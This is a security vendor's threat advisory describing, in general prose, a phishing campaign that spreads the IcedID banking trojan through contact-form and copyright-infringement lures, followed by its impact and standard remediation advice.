Rewterz Threat Advisory – CVE-2021-29302 – TP-Link TL-WR802N and Archer_C50v5_US devices buffer overflow
April 13, 2021Rewterz Threat Alert – Kimsuky APT group – IOCs
April 13, 2021Rewterz Threat Advisory – CVE-2021-29302 – TP-Link TL-WR802N and Archer_C50v5_US devices buffer overflow
April 13, 2021Rewterz Threat Alert – Kimsuky APT group – IOCs
April 13, 2021Severity
High
Analysis Summary
The IcedID is a modular banking trojan that infects the device and deploys malware to access and steal financial information – including usernames and passwords – for online banking sessions. It uses multiple injection methods to bypass CAPTCHA protection.
The recent phishing campaign uses contact forms to evade detection, and floods companies with an immense number of phishing and spam messages. The threat amplifies as the malware can target the victim company’s secure email gateways and directly pop into the user’s primary inbox – whereas it would’ve landed into the target’s spam folder.
What’s more worrisome is that the attackers threaten and blackmail the victims with copyright infringement, further increasing their attack’s efficiency.
Another tactic used by the attackers is to use COVID-19 information and related health-themed emails to attract potential victims.
As the unwitting victims click on the links of evidence regarding their copyright infringement, they are asked to login via google. This is where a .js file is seamlessly downloaded onto their desktops, and the device becomes compromised. Powershell and Wscript are used to download the Cobalt Strike Beacon and IcedID payload. And this is where the malware penetrates the victim’s device.
The IcedID malware is region-specific as it targets users in Italy. Furthermore, the infected emails carry ZIP files and used “fake reply techniques” in European languages to increase their efficiency.
Impact
- User Login credentials and bank account access are exploited.
- Financial information of banking services and institutions is attacked.
- Browser traffic is monitored.
- Also, it is a dropper for other malware.
Remediation
- Keep antivirus applications updated.
- Perform consistent anti-malware scans of the system to ensure the known malware and viruses are promptly spotted and mitigated.
- Enable two-factor authentication techniques.
- Update all applications and software and install the latest patches.
- Create policies and takes steps to ensure that malicious emails end up in the spam folder.
- If a file is perceived to contain malicious software, open it in a virtual environment.